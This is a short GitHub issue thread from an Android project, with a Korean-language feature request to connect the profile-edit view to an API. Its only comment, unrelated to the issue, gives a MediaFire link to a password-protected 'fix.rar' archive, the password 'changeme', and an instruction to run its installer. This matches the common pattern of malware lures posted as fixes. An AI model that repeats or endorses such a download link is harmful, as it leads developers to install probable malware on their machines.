### ISSUE TITLE
feat: 프로필수정 뷰 api 연결

### ISSUE THREAD

**Issue by junseo511** [Team-WSS/WSS-Android#227]
## 📜 Overview (Required)    
  
프로필수정 뷰 api 연결

## 📌 Child Issue(Optional)  

- #250 

## 📍 Note (Optional) 
No response

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
